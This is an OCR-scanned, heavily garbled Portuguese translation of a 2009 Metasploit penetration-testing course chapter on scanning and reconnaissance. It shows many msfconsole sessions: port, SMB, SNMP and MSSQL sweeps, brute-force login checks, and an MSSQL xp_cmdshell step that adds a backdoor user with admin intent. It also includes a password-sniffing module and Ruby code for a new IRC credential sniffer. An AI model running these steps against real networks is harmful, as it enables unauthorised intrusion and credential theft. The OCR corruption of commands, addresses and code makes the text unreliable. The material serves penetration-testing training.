ase2us category tap ouput (rere pors on 12 68 5 tsa BE cane PONE FOR Tip Tap =A Nat shown '905\ closed ports Bikey open ftp 2.0.5, . BARE open ash a: 292 Debian aubuntud (prateest 2.0) Sojice spin Rite ‘che’ heipd 2-3-3" unten 3) Tocalhost30% Notes on Scanners and Auxiliary Modules Scanners e mais outros médulos auxiliares use a opcio thosts em vez de RHOST. Rhosts pode ter intervalos de IP (192.168.1.20-192.168.1.30), os intervalos CIDR (192.168.1.0/24), varios intervalos separados por virgulas (192.168.1.0/24, 192.168.3.0/24), ea linha de lista de hosts separados arquivos (file: / tmp / hostlist.txt). Este é um outro uso para o nosso arquivo de saida para ‘0 grep do Nmap. Note também que, por padrao, todos os méduilos de scanner ter o valor FIOS definido paral. O valor FIOS define o nimero de threads simultneos para usar durante a digitalizacao. Defina esse valor para um niimero maior, a fim de acelerar o seu scans ou manté-la baixa, a fim de reduzir 0 trafego de rede, mas ndo se esqueca de respeitar as seguintes orientagdes: * Manter o valor de 16 LINHAS em sistemas Win32 native * Mantenha FIOS menos de 200 quando estiver executando MSF em Cygwin * Em sistemas operacionais Unix-like, fios pode ser configurado para 256. Port Scanning Além de executar 0 Nmap, ha uma variedade de scanners de portas de outros que estao disponiveis para nds no quadro. sf > search portscan [*] Searching’ loa modules for pattern ‘portscan'... © Offensive Security 2009 Traduzido por Rafael Torresner /portscan/ack TCP ACK Firewall Scanner scanner/portscan/ftpbounce FTP Bounce Port Scanner scanner/portscan/syn TCP SYN Port Scanner scanner/portscan/tep TCP Port Scanner scanner/portscan/xnas TCP "Was" Port Scanner Para efeitos de comparagio, vamos comparar 0 nosso Nmap resultados de varredura para a porta 80 com um médulo de digitalizac3o Metasploit. Primeiro, vamos determinar quais hosts tinha 80 porta aberta de acordo com o Nmap. sf > cat subnet_i.gnmap | grep 80/open | avk “{print $2)" [+] exec: cat subnet_t.gnnap | grep 80/open | auk "{print $2} 192.168.1.1 192.168.1.2 192,168.1,10 192,168:1.109 192.168.1.116 192,168.1.150 O Nmap scan nds executamos anteriormente era um scan SYN, ent&o vamos executar o scan mesmo em toda a sub-rede olhando para a porta 80 através de nossa interface eth0 usando 0 Metasploit. sf > use scanner /portscan/syn asf auxiliary(syn) > show options Hodute options: Name Current Setting Required Description BATCHSIZE 256 yes The nunber of hosts to scan per set INTERFACE ne The nane of the interface PORTS 1-10004 yes Ports to scan (e.g. 22-25,80,110-900) HOSTS: yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads TIMEOUT 500 yes The reply read timeout in milliseconds nsf auxiliary(syn) > set INTERFACE othe INTERFACE => etho sf auxiliary(syn) > set PORTS 60 PORTS => 80) sf auxiliary(syn) > set RHOSTS 192.168.1.0/24 RNOSTS => 192.168.1.0/24 sf auxiliary(syn) > set THREADS 50 THREADS => 50 ry(syn) > run [+] TeP OPEN 192.168.1.1:80 [+] TeP OPEN 192.168.1.2:80 [+] TéP OPEN 192-168.1.11 [J TeP OPEN 192.168.1.109:80 [+] TeP OPEN 192.168.1.116:80 [e+] Tep open 192-168.1.150:80 © Offensive Security 2009 Traduzido por Rafael Torres[*] auxiliary module execution completed Assim, podemos ver que Metasploit’s built-in médulos scanner so mais capazes de encontrar sistemas e abrir a porta para nds. E apenas uma ferramenta excelente para ter no seu arsenal, se acontecer de vocé estar executando 0 Metasploit em um sistema sem Nmap instalado. SMB Version Scani ie Agora que nés determinamos que hosts estio disponiveis na rede, pode-se tentar determinar quais sistemas operacionais esto fincionando. Isso nos ajudaré a diminuir nossos ataques para atingir wm sistema especifico e nos impede de perder tempo com aqueles que ndo esto vulneraveis a uma exploracdo particular. Uma vez que existem muitos sistemas em nossa pesquisa que a porta 445 aberta, vamos usar 0 ‘scanner smb / versio / médulo’ para determinar qual versio do Windows esta sendo executado em um alvo e qual a versdo do Samba esta em um host Linux. RWOSTS 192.168.1.0/24 192, 168.1.0/24 maf auxiliary(version) > set THREADS 50 THREADS => 50 sf auxiliary(version) > run [+] 192.168.1.100 is running Windows 7 Enterprise (Build 7608) (Language: Unknown) [+] 192/168:1.116 is running Unix Samba 3.0.22 (Language: Unknown) [+] 192.168.1-21 is running i ) language: Unknown) [+] 1921468:17351 is running (Language: Unknown) (J 192.268:1-331 is running English) [+] 1921468:2.324 is running \guage: English) [+] 192,168.1/124 is running Windows ¥ Service Pack 3 (Language: English) [+] Auxiliary module execution completed Além disso, observe que, se emitir 0 comando ‘db_hosts' agora, as informagdes recém-adquiridas ‘sfo armazenadas no banco de dados do Metasploit. nsf auxiliary(version) > db_hosts [e] Time: Thi Aug 13 19:39: Host: 192.168.1.1 Status: alive 05 Thu Aug 13 Host: 192.168-1.2 Status: alive 0s Thu Aug 13 Wost: 192. Thu Aug 13 Host: 192.168.1.100 Windows Windows 7 Cy td as B Host: 192.168.1.104 Host: 192.165.1,109, te B Host: 192.268.1.111 Windows Windows xP td B Host: 192.165.2.114 Windows Windows XP ty B Host: 192.168.1.116 a Unknown Unix (1 B Wost: 192.168.1.121, Alive 05: Windows Windows 7 utes t+] 33 19:39:08 Host: 192,168.1.123 Status: alive 08: td 33 10:39:05 Host: 192.165.1.126 Status: alive 0S: Windows windows x t) 23 19:39:06 Host: 192,168.1.137 Status: alive 05 tl 33 19:39:06 Host: 192.168.1.150 alive 0s 13 19:39:06 Host: 192.165.1,151 Windows Windows © Offensive Security 2009 Traduzido por Rafael TorresIdle Scanning IPID Nmap Idlescan nos permite ser um pouco digitalizacdo stealthy um alvo enquanto spoofing do endereco IP de outro host na rede. Para que este tipo de verificaco para o trabalho, teremos de encontrar uma maquina que esté ociosa na rede e usa IPID seqiiéncias de uma ou Incremental Incremental Little-Endian Broken. Metasploit contém 0 médulo scanner "/ip / ipidseq’ para digitalizar e olhar para uma maquina que se adapta as exigéncias. Para mais informagGes sobre Idlescan com o Nmap, consulte http://nmap.org/book/idlescan. html maf auxiliary(uritable) > use scanner/ip/ipidseq nsf auxiliary(ipidseq) > show options Hodute options: Name Current Setting Required Description HOSTS yes The target address range or CIDR identifier RPORT 39 yer The target port THREADS 1 yes The nunber of concurrent threads TIMEOUT 500 yes The reply read timeout in milliseconds nsf auxiliary(ipidseq) > set RHOSTS 192.168.1,9/24 RHOSTS => 192.168.1.0/24 nsf auxiliary(ipidseq) > set THREADS 50 THREADS => nsf auxiliary(ipidseq) > run [+] 192,168.1.1's PID sequence class: All zeros [+] 192/168:1°2's IPID sequence class: Increnental! (] 192/168,1:10's IPI sequence class: Incremental! [+] 192/168:1/104"s PID sequence Randomized +] 192,168:1.109's IPID sequence class: Increnental! [+] 192'168/1/111's TPTD sequence Increnental! [+] 192/16811/124's 1PID sequence Incremental! [+] 192,268.1:336's eID sequence ALL zeros [+] 192/168.11124+2 IPID sequence Incremental! [+] 192/2681.323's IPID sequence Incremental! [+] 102/168,11137"s IPID sequence ALL zeros, [+] 192,268.1:350's IexD sequence class: ALL zeros (] 10226812: 181°2 1PxD Sequence clase: Incremental! [+1 Auxiliary nodule execution completed A julgar pelos resultados de nosso exame, temos uma série de zumbis potencial que podemos utilizar para realizar a digitalizaco ocioso. Vamos tentar digitalizar um host com o zumbi no 192.168.1.109 e ver se obtemos os mesmos resultados que tivemos anteriormente, ‘maf auxiliary ipidseq) > nmap -PN -sI 192.168,1.109 192.168,1.114 [oJ exec! nmap “PH =sI 192,168.1.109 192.168.1.114 Starting nap 5.00 ( http://nmap.org ) at 2009-08-14 05:51 HOT Idle scan using zombie 192.168.1.109 (192.168.1.109:80) Interesting ports on 192.168.1,114: Not shown: 996 closed] filtered ports PORT STATE SERVICE 135/tep open nsrpe 139/tcp open netbios-ssn 445/tep open microsoft-ds 3389/tep open ns-tern-serv MAC Address: 60:0¢ F2:E8 (VMware) © Offensive Security 2009 Traduzido por Rafael TorresNeap done: 1 IP address (1 host up) scanned in 5.56 seconds Hunting for MSSQL Uma das minhas favoritas é a UDP avancado footprinting de servidores MSSQL. Se vocé estiver realizando um teste de penetragao interna este é um deve usar a ferramenta. Quando MSSQL instala, ele instala ou na porta TCP 1433 ou um acaso da porta TCP dindmicas. Se a porta é gerado dinamicamente, isso pode ser bastante complicado para um atacante para encontrar os servidores MSSQL ao ataque. Felizmente com a Microsoft, que nos abengoou com a porta 1434 UDP que, ‘uma vez consultada permite que vocé puxe um pouco de informacdes sobre o SQL Server, Incluindo a porta que 0 ouvinte esta no TCP. Vamos carregar 0 médulo e usa-lo para descobrit varios servidores. sf > search assql [*] Searching loaded modules for pattern ‘nesql’ Exploits Name Description windows/mssql/lyris_Listmanager_weak_pass Lyris ListHanager NSDE Weak sa Password \eindows/mssql/ms02_639_sLa Microsoft SQL Server Resolution Overflow \eindows mssql/ms02_056 hello Microsoft SOL Server Hello Overflow windows /mssql/mssqU_payload Microsoft SOL Server Payload Execution auxiliary Name Description adnin/nssql/nssql_enum _Wicrosoft SOL Server Configuration Enunerator adnin/nssql/mssqliexec Microsoft SOL Server xp_cadshell Conand Execution adnin/nssql/nssql—sql Microsoft SOL Server Gene Scanner/nssql/assql login NSSQL Login Utility scanner/nssql/mssql_ping NSSQL Ping Utility sf > use scanner /nssql/mssql_ping sf auxdliary(nssql_ping) > show options Module options: Name Current Setting Required Description HOSTS yes The target address range or CIOR identifier THREADS 1 yes The nunber of concurrent threads sf_auxiliary(nssql_ping) > set RHOSTS 10.211.55.1/24 RHOSTS: 211.55.1/24 sf euxiliary(nssql_ping) > exploit [+] SOL Server information for 10,211.55, 128: (e] top = 2493 [+] np = SSHACKTHISBOX-Opipesqlquery [+] Version = 8.00.194 [+] Instancellane = MSSOLSERVER [x] Isclustered = no [i] Servertiane = ssHACKTHISBOX- [+] Auxiliary module execution completed © Offensive Security 2009 Traduzido por Rafael Torresprimeiro comando que foi emitida a procura de qualquer ‘mssql’ plugins. O segundo conjunto de Instrugées foi o ‘scanner use / mssql / mssql_ping, este ira carregar 0 médulo scanner para nds. Em segitida, "mostrar opgdes" permite-nos ver o que nds precisamos especificar. 0 'set thosts 10.211.55.1/24' define o intervalo de sub-rede que queremos comecar a olhar para servidores de SQL. Vocé pode especificar um / 16 ou o que vocé quer it depois. Eu recomendaria aumentar 0 miimero de tdpicos, pois isso pode levar um longo tempo com um scanner tinico thread. Apés 0 comando "executar" ¢ emitido, um exame vai ser realizado e puxar informagBes especificas sobre o servidor MSSQL. Como podemos ver, o nome da maquina é "SSHACKTHISBOX-0" ea porta TCP esta sendo executado em 1433. médulo Nesse ponto, vocé poderia usar o 'scanner mssql / mssql_login /’a forga bruta a senha, passando 0 arquivo de um médulo de dicionario. Alternativamente, vocé também pode usar Fast-Track, medusa, ou hydra para fazer isso. Uma vez que vocé conseguitt adivinhar a senha, nao ha um médulo pequeno puro para executar 0 xp_cmdshell procedimento armazenado. iary(nssql_login) > use admin/nssql/nssql_exec ry(mssql_exec) > show options Module options: Name Current Setting Required Description ono ced.exe /¢ echo OWNED > C:\onned.exe no Command to execute HEX2BINARY /pentest/exploits/framework3/data/exploits/assql/h2b no The path to the hex2binary script on the disk Nssal_pass no The password for the specified usernane MSSOL_USER sa no The usernane to authentizate as ‘RHOST yes Ihe target address PORT 1433 yes The target port maf auxiliary(nssgl_exec) > set RHOST 10.211.55.128 RHOST => 10.211.55.128 taf auxiliary(nssqi exec) > set CHD net user reltk ihazpassword /A00 ced => net user relik ihezpassword. /AD) sf auxiLlary(assql_exec) > exploit ‘The connand completed successfully. []_Auxitiary module execution completed Olhando a saida do “ihazpassword rel1k net user / add ", que foi adicionado com sucesso uma conta de usuério chamado" rel1k ", a partir dai, poderfamos emitir" net localgroup administradores rel1k / ADD para obter um administrador local no sistema em si. Nés temos 0 controle total sobre 0 sistema neste momento. Service Identification ‘Mais uma ve7, 4 excepco de usar o Nmap para realizar a digitalizacao dos servicos em nossa rede de destino, Metasploit também inclui uma grande variedade de scanners para varios servigos, uitas vezes, ajudé-lo a determinar potencialmente vulneraveis servigos rodando em méqu alvo. nase © Offensive Security 2009 Traduzido por Rafael Torressf auxiliary(tcp) > search auxiliary “se: Te] Searching loaded modules for pattern Auxiliary scanner/dh2/ discovery Seanner/deerpe endpoint _napper seenner/deerpe /nidden mer /dcerpe /managenent mner/deerpe/tep_dcerpe_auditor mer /dect/eal. scanner mer /dect/station, scanner seamner/dfcavery/aP_oweeh Sconner /discovery/svesp Ecanner/ene/alphastor davicenanager Scenner /ene /alphastor_Librerynanager Scanner /fep anonymous scanner /http/ frontpage Ecanner/http/frontpage_ Login scanner/netp/Leky punch mer/http/ms09_020_webdav_unicode_bypass mner/netp options wer/http/version Scanner motorola tinbul uu Seanner/masql/assal. Losin Seenner/nssql mssql pang Seenner/nysql/version Seanner/nfa/nfanoune Seanner/oracle/ene. aid mer /oracle/sid_anum mer /aracle/spy_sid tion. vy ner /oracle/tnstanr_version mer oracte/xdb sid --snip, scanner/sip/enunerator seenner/sip/options seanner/snb/Login scanner/snb/pipe, scenner/snb/pipe scanner/snb /seb2) scanner/snb/version ner /sntp/smtp_banner ner /snmp/aix Version ner /stip/comfunity ner /ssh/ssh_version scanner /telephony/wardial scenner/tftp/tftpbrute seanner/vnc/vne_none_auth seanner/x11/open_x1i Description DB2 Discovery Service Detection. Endpoint Happer Service Discovery Hidden DCERPC Service Discovery Renote Managenent Interface Discovery DCERPC TCP Service Auditor DECT Call Scanner DECT Base Station Scanner ARP Sweep Local Network Discovery UDP Service Sweeper ENC AlphaStor Device Manager Service. ENC AlphaStor Library Nanager Service. Anonymous FIP Access Detection FrontPage Server Extensions Detection FrontPage Server Extensions Login Utility HTTP Microsoft SQL Injection Table XS5 Infection 509-920 TTS6 WebDAV Unicode Auth Bypass HTTP options Detection HTTP Version Detection IPID Sequence Borland Inter se Services Manager Information Motorola Timbuktu Service Detection. NSSOL Login utility NSSOL Ping Utility HySOL Server Version Enumeration NFS Mount Scanner Oracle Enterprise Manager Control SID Discovery SID Enuneration. Oracle Application Server Spy Servlet SID Oracle tnslsnr Service Version Query. Oracle IL DB SID Discovery SIP SIP SPB SHE ste SHE usernane enurerator Endpoint Scanner Login Check Scanner Session Pipe Auditor Session Pipe DCERPC Auditor 2.0 Protocol Detection SHB Version Detection SHTP Banner Grabber AIX SNP Scanner Auxiliary Hodule SUMP Community Scanner SSH Version Scannner Wardialer TFTP Brute Forcer Wc Authentication lone Detection X11 Mo-Auth Seanner Nosso port scan apareceram algumas maquinas com a porta TCP 22 em aberto, SSH é muito seguro, mas as vulnerabilidades nao so desconhecidos e que sempre vale a pena reunir tanta informagio quanto po: ivel de seus alvos. Vamos colocar a nossa saida para o grep de ficheitos a utilizar para este exemplo, analisar as maquinas que tém a porta 22 aberta e passé-lo para “rhosts. sf auxit sf auxiliary(ssh_version) > show options Module options: ry(arp_sweep) > use scanner/esh/sch_version © Offensive Security 2009 Traduzido por Rafael TorresName Current Setting Required Description HOSTS The target address range or CIDR identifier RPORT 22 yes The target port THREADS 1 yes ‘The nunber of concurrent threads nsf auxiliary(ssh_y [mp [22_open. txt [rT exee: cat subnet_t.gnnap | grep 22/open | auk ‘{print $2}' > /tmp/22_open.txt sion) > cat subnet_t.gnnap | grep 22/open | auk {print $2}' > iaaf_auxiliary(ssh_version) > set RHOSTS file: /tmp/22_open.txt RHOSTS => fae: /tip/22 open, txt asf auxitiary(ssh version) > set THREADS 50 THREADS =>'50 asf auxitiary(ssh_version) > run [J 192.168.1.1:22, SSH server version: SSH-2.9-dropbear_9.52 [+] 192,168:11137:22, SSH server version: SsH-1.99-OpenSSH_4.4 [+] Auxiliary module’ execution completed Mal configurados servidores FTP podem frequentemente ser 0 ponto de apolo que vocé precisa para ganhar acesso a uma rede inteira por isso sempre vale a pena verificar para ver se 0 acesso anénimo € permitido sempre que vocé encontrar uma porta FTP aberto que normalmente é a porta TCP 21. ‘Vamos definir as linhas para 10 aqui como estamos indo s6 para verificar um intervalo de 10 hosts sf > use scanner/ftp/anonymous nsf auxdliary(anonynous) > set RHOSTS 192.168.1.29-192.168.1.30 RHOSTS => 192.168.1,20-192.168.1.30 maf_auxiliary(anonynous) > set THREADS 10 THREADS => 10 sf auxiliary(anonynous) > show options Module options: Name Current Setting Required Description FIPPASS mozillagexanple.con no ‘The password for the specified username FIPUSER anonymous no ‘The usernane to authenticate as HOSTS. yes The target address range or CIDR identifier RPORT 21 yes The target port THREADS 1 yer The number of concurrent threads sf auxiliary(anonynous) > run 192.168.1.23:21 Anonynous READ (220 (vsFTPd 1.1.3) Recording successful FIP credentials for 192.i68.1.23, Auxiliary module execution conpleted roa tA 1 Em um curto espago de tempo ¢ com muito pouco trabalho, somos capazes de adquirir uma grande quantidade de informagées sobre os hosts que residem em nossa rede, portanto, fornecer-nos uma imagem muito melhor do que estamos enfrentando na realizagao de nosso teste de penetracio © Offensive Security 2009 Traduzido por Rafael TorresCERES Ble Edit View History Bookmarks Tools Help €~ 8 @ Banas —-|. a {)Remote-cxploit [Offensive Security JAE Forums fjfmiworm [6 Metasploit [)Aircrack-ng [MSTFR > rea 230 (ogo Cimento. Gent» (oactiaren & = E) © dino | Tj roveavgotes +S (GUpoades tes tem = 4Quewe203 (ze 3 Category: map ouput Gere (@) Sate open, Service: mp Apache apd 223 (Ut) Hep eu Tia 29 A aoren Gates ester Cais 1582108 ise 882100 Gaia iss 20 (Ges 2100 Category Auth Lastop Inporcnete... | Atachneres whats new ths version? Titpsi/focalhost:3004) Tocalhost:3004 &3 [5] Password Sniffing Recentemente, Max Moser liberada uma senha Metasploit sniffing médulo chamado ‘psnufile ", que ird capturar senhas fora do fio similar ao dsniff ferramenta. Actualmente suporta POP3, IMAP, FTP. © HTTP GET. Vocé pode ler mais sobre o médulo no Blog do Max na http://remote- exploit blogspot.com/2009/08/psnuffle-password-sniffer-for:html. Usando 0 médulo 'psnuffle é extremamente simples. Existem algumas opgGes disponiveis, mas 0 médulo funciona muito bem “out of the box” maf > use euxiliery/sniffer/psnuffle sf auxiliary(psnuffle) > show options Hodule options: FILTER ne Ihe filter string for capturing traffic INTERFACE no The nane of the interface PCAPFILE ne The nane of the PCAP capture file to process PROTOCOLS all yes A conna-delinited List of protocols to sniff or “alt”. HOST yes The target address SUAPLEN 65535, yes The nunber of bytes to capture TIMEOUT 1 yes The nunber of seconds to wait for new date Como vocé pode ver, a tinica opcio obrigatéria que requer sua acdo é RHOST. Existem também. algumas opcées disponiveis, incluindo a capacidade de importar um arquivo de captura PCAP, ‘Vamos executar 0 scanner no modo padrio. © Offensive Security 2009 Traduzido por Rafael Torresasf auxiliary (psnuffle) > set RH0ST 192.165.1.155 RaosT => 192/168.1.155 asf auxitiary(psiuffle) > run {*] auxiliary module running as background job {] Loaded protocol FIP fron /pentest/exploats/franework3/date/exploits/psnutf fle/ftp.rb [+] Leaded protocol IMAP from /pentest exploite/franework3/d {*] Loaded protocol POP3 from /pentest /exploits/franework3/d {1 Loaded protocol URL fron /pentest/exploits/franework3/da [+] Sniffing traffic. [4] Successful FIP Login? 192.168.1.112:21-192.168.1.101:48614 >> dookie / dookie (220 3Con 3eDaenon FIP Server Version 2.0) exploits /psnutfle/inap. rb... ‘exploits /psnuffle/pop3.rb... xploits /psauffle/url. rb. Nao! Nés capturamos uma sesso FTP com éxito. Esta € uma excelente ferramenta para a recolha de informagao passiva How to write a new psnuffle module Psnuffle € facil estender devido ao seu design modular. Esta seco guiard através do processo de desenvolvimento de uma IRC (Internet Relay Chat) sniffer protocolo (Informe mensagens € Nick). Module Location Todos os médulos estao localizados em diferentes dados / exploits / psnutfle. Os nomes sé correspondentes aos nomes protocolo utilizado dentro psnuffle. Para desenvolver o nosso préprio médulo, vamos dar uma olhada nas pecas importantes do actual pop3 sniffer médulo como um modelo. Pattern definitions: self.sigs = { ok /*(+0K[*n]*)n/si, rerr => /*(-ERR[*n]*)n/si, user => /*USERS+([*n]+)n/si, tpass => /*PASSs+([*n]+)n/si, rguit => /*(QUITs*[*n]*)n/si } Esta seco define os padrées de expresso que seré utilizada durante sniffing para identificar dados interessantes. As expresses regulares olhar muito estranho no comeco, mas sao muito poderosas. Em resumo, tudo dentro de () estario disponiveis dentro de uma variavel mais tarde no script. self.sigs = { suser => /*(NICKs+[“n]+)/si, spass => /b(IDENTIFYs+[“n]+)/si,} IRC para esta seco seria parecido com esses acima. Sim, ett no sei tudo nickservers IDENTIFY esto usando para enviar a senha, mas 0 faz na freenode. Hey seu :-) um exemplo © Offensive Security 2009 Traduzido por Rafael TorresSession definition: Para cada médulo, primeiro temos de definir quais portas ele deve tratar e como a sesso deve ser monitorado. return if not pktl:tep] # We don't want to handle anything other than tcp return if (pkt[:tep]-sre_port != 6667 end pkt[:tep].dst_port != 6667) # Process only packet on port 6667 for both way of communication is sent to server cp] .dst_port}- ‘Ensure that the session hash stays the SIGE Mop deport a=" Bab7) en pack session etek iph dat i: e(atl then neaiet {s°coning from. the server (e{pke sip] .sre_ip}:#{oktT:tep].sre_port}- yeatoREL 8p) dat port}") #pktl sip] dst end ‘Agora que temos nm objeto de sesso tinica que consolida informacdes, podemos ir em processo & contetido do pacote que combinava com uma das expressOes regulares que definimos anteriormente. case matched lihen user # when the pattern /~(WICKs+[~n]+)/si" is matching the packet content sl matches #Store the nane into the session hash s for later use # Do whatever you Like here... maybe a puts if you need to When :pass # then the pattern "/b(IDEMTIFYs+("n]+)/si" is matching s[:pass]=matches # Store the passuord into the session hash s as well if (s{zuser] and s{:pass]) # When we have the nane and the pass sniffed, print it Print "=> IRC login sniffed: #{s[:session]} >> usernane:4{s[suser]) password: #(s| fend Sessions.delete(s[:session]) # Renove this session because we dont need to track it anymore when nit #'tlo matches, don't do anything else # Just in case anything else is matching Sessions[s[:session]].nerge! ({k => matches}) # Just add it to the session object end pass]}0" SNMP Sweeping arre SNMP sio frequentemente um bom indicador para encontrar uma tonelada de informagdes sobre um sistema especifico ou realmente comprometer o dispositivo remoto. Se vocé puder encontrar um dispositivo Cisco executando uma sequéncia particular, por exemplo, vocé pode realmente fazer o download da configuracao do dispositive inteiro, modificé-lo e enviar a sua configuragao prépria malicioso. Também muitas vezes, as senhas so se o nivel 7 codificado que os meios eles so triviais para decodificar e obter o permitir ou login senha para o dispositivo especifico. ‘Metasploit vem com construido no médulo auxiliar especificamente para dispositivos de varredura SNMP. Ha um par de coisas a compreender antes de executar 0 nosso ataque. Primeiro, leia sé escrever ¢ ler strings da comunidade desempenham um papel importante sobre o tipo de informagao pode ser extraida ou modificado sobre os dispositivos de si. Se vocé pode "adivinhar" o strings somente leitura ou leitura-escrita que vocé pode obter um pouco de acesso que vocé normalmente © Offensive Security 2009 Traduzido por Rafael Torresno teria, Além disso, se os dispositivos baseados em Windows sao configurados com SNMP, muitas vezes, com cordas / RO a comunidade RW vocé pode extrair os niveis de patch, servigos em execugio, tempos de reboot passado, nomes de usuario no sistema, rotas e varios outros montantes de informacao que é valioso para um atacante. Ao consultar através do SNMP, que é o que é chamado de API MIB. O MIB representa 0 ‘Management Information Base (MIB), essa interface permite que vocé consulta o dispositivo e extrair informacdo. Metasploit vem carmegado com uma lista de MIBs padrao que tem em seu banco de dados, ele usa-los para consulta o dispositivo para obter mais informacSes, dependendo de qual nivel de acesso é obtido. Vamos dar uma olhada no médulo auxiliar. maf > search snmp [*] Searching loaded modules for pattern ‘snmp’... Exploits Name vescription windows /ftp/oraclesi_xdb_ftp_unlock Oracle 9i x08 FTP UNLOCK overflow (win32) auxiliary Name Description Scanner/snmp/aix_version AIX SNMP Scanner Auxiliary Nodule scanner/snmp/comfunity SNMP Conmunity Scanner maf > use scanner /snmp/conmunity sf auxiliary(conmunity) > show options Module options: Name Current Setting Required Description BATCHSIZE 256 yer The nunber of hosts to probe in each set COMMUNITIES —/pentest /exploits/franework3/data/wordLists/snmp.txt no The list of communities that should be attenpted per host ‘RHOSTS. yes The target address range or CIOR identifier ‘RPORT 161 yes The target port THREADS 1 yee The nunber of concurrent threads maf auxiliary(conmunity) > set RHOSTS 192.168,0,0-192.168.5.255 thosts => 192.168.0,0-192.168.5.255 sf auxiliary(conmunity) > set THREADS 10 ‘threads => 10 ry (community) > exploit >> progress (192.168.0.0-192.168.0.255) 0/30208. 2 progress (202.268.3.0-292,268.1.255) 0/30208... >> progress (192.168.2. 255) >> progress (192.168.3. >> progress (192.168.4.0-192.168.4.255) >> progress (-) 6/0. 197 168-150 public! "AC Yeb/SMP Managanent Card, (W8:¥3 23.5.5 105_355.bin AF1:v3.5.5 AN1:apc_hw02_sumx_355.bin M:AP9619 HR:A10 SN: NAGB27001465, fn0:07/01/2008) (Embedded Poveriiet SMP aged SH v2"? compatible)" [+] Auxiliary module execution completed Como podemos ver aqui, nés fomos capazes de encontrar uma string de comunidade de "piblico”, © Offensive Security 2009 Traduzido por Rafael Torreseste é mais provavel read-only e nao revelam uma tonelada de informagdes. Fazemos saber que 0 dispositivo é um APC Web / SNMP do dispositivo, e que suas versdes em execuciio. Writing your own Scanner Ha momentos em que vocé pode precisar de um scanner especifico, ou com varredura actividade realizada no Ambito Metasploit seria facil para os fins de scripting usando um programa externo. Metasploit tem um monte de recursos que pode vir a calhar para esse efeito, como 0 acesso a todas as classes e explorar métodos, suporte embutido para proxies, SSL, relatérios e construido em segmentaco. Pense em casos em que vocé pode precisar de encontrar cada instancia de uma senha em um sistema, ou uma digitalizacdo de um servico personalizado. Sem mencionar, é bastante rapido e facil de escrever o seu scanner personalizado. Iremos utilizar este simples scanner TCP que ird conectar a um host em uma porta padrao de 12345, que podem ser alterados através das opgdes do médulo em tempo de execugao. Ao se conectar 20 servidor, ele envia "OLA SERVER ', recebe a resposta e imprime-lo juntamente com 0 endereco IP do host remoto. require ‘msf/core* class Metasploit? < Hef::Auxiliery super( ‘Wane’ => ‘My custom TCP scan ‘Version’ => ‘SRevision: 1 §" ‘Description’ ‘author’ => ‘Your name here’, ‘License! => HSF_LTCENSE ) register options( [ opt: :RPORT(12345) 1, self.class) fend fF run_host(ip) connect) Sock. puts (‘HELLO SERVER") data = sock. recv(1024) print_status("Received: #{data} from #{ip)") disconnect() fend fend Nés podemos salvar para 0 nosso diretério. /Modules/auxiliar/scanner/diretério como "simple_tcp.rb e carregar msfconsole. E importante notar duas coisas aqui. Primeiro, os médulos sio carregados em tempo de execucao, assim nosso novo médulo nao aparecerd a menos que reiniciar nossa interface de escolha. A segunda é que a estrutura de pastas é muito importante, se teria poupado o nosso scanner abaixo. / Modules / auxiliar / scanner / http / ele iria aparecer na lista de médulos como "scanner http // simple_tcp. Para testar este scanner, configurar um ouvinte netcat na porta 12345 e tubo em um arquivo de texto para servir de resposta do servidor. © Offensive Security 2009 Traduzido por Rafael Torresroot@bt4:~/docs# nc -\nvp 12345 < response. txt listening on [any] 12345 Em seguida, vocé seleciona o seu novo scanner, definir seus parametros, ¢ executé-lo para ver os resultados. msf > use scanner/simple_tcp msf auxiliary(simple_tcp) > set RHOSTS 192.168.1.101 RHOSTS => 192,168,1.101 msf auxiliary(simple tcp) > run [*] Received: hello metasploit from 192.168.1.101 [*] Auxiliary module execution completed ‘Como vocé pode dizer a partir deste exemplo simples, este nivel de versatilidade pode ser de grande ajuda quando vocé precisa de um cédigo personalizado no meio de um teste de penetracio. A poténcia do quadro e cédigo reutilizével realmente brilha por aqui. Vulnerability Scanning Scanner de Vulnerabilidade permite que vocé rapidamente digitalizar uma meta de faixa de IPs procurando por vulnerabilidades conhecidas, dando um testador de penetracao de uma ideia répida do que o ataque poderia ser a realizagio valor. Quando usado corretamente, esse é um grande trunfo para um testador de caneta, mas ndo é sem ela chamar costas. Vulnerabilidade é bem conhecido por uma elevada taxa de falsos positivos e falsos negativos. Isto tem que ser mantido em mente quando se trabalha com qualquer varredura de vulnerabilidades de software. Deixa o olhar através de algumas das capacidades de vulnerabilidades que o Metasploit Framework pode proporcionar. SMB Login Check ‘Uma situag&o comum é encontrar-se na posse de uum nome de ustatio e senha validos, e se perguntando onde mais vacé pode usé-lo. Este é o lugar onde o Login SMB Check Scanner pode ser muito titil, pois ele iré se conectar a uma gama de hospedeiros e determinar se o nome de ustétio / senha pode acessar o alvo. Tenha em mente, isso é muito "forte" como ele vai aparecer como uma tentativa de logon falhou nos logs de eventos de cada caixa de Windows que toca. Seja cuidadoso na rede que esta a tomar esta ago em. Todos os resultados de sucesso pode ser conectado ao windows / smb / psexec explorar médulo (exatamente como a ferramenta standalone) que pode ser utilizada para criar sessdes Meterpreter. © Offensive Security 2009 Traduzido por Rafael Torresnsf > use auxiliary/scanner/snb/login iMsf auxiliary(login) > shiow options Module options: Name Current Setting Required oescription ANOSTS yes The target address range or CIDR identifier RPORT 445 yes Set the SHE service port SHBDanain WORKGROUP fo S¥E Domain SYEPass no SHB Password SMBUser —Adninistretor no SHB Usernane THREADS 1 yes The number of concurrent threads asf auxiliary(login) > set RHOSTS 192,168.1.0/24 RHOSTS => 192.160.1.0/24 sf auxiliory(login} > set SMBUser victim StRuser => victim Ast auxiliary(login) > set SMBPass s3cr3t SHBPass => sScr3t asf auxiliary(login) > set THREADS 50 THREADS => 50 ‘asf auxiliary(login) > run ] 192,168.1.109 - FAILED Oxc0B0006d - STATUS_LOGON_FATLURE ] 192116811111 = FAILED OxcOB9006d - STATUS_LOGON FAILURE ] 192,168.11114 - FAILED OxcO@0006d - STATUS “LOGON FAILURE ] 1921168.11125 - FAILED OxcO80006d - STATUS LOGON FAILURE J 1927168.11126 ~ SUCCESSFUL LOGIN (Unix) |] Auxiliary module execution completed nsf auxiliary(login) > VNC Authentication None O VNG Authentication Scanner iré procurar um intervalo de enderegos IP & procura de alvos que esto rodando um servidor VNC sem uma senha configurada. Muito bem cada administrador vale 0 seu sal define uma senha antes de permitir conexdes de entrada, mas vocé nunca sabe quando voce pode pegar um golpe de sorte e uma caneta de teste bem-sucedido no deixa pedra sobre pedra. De 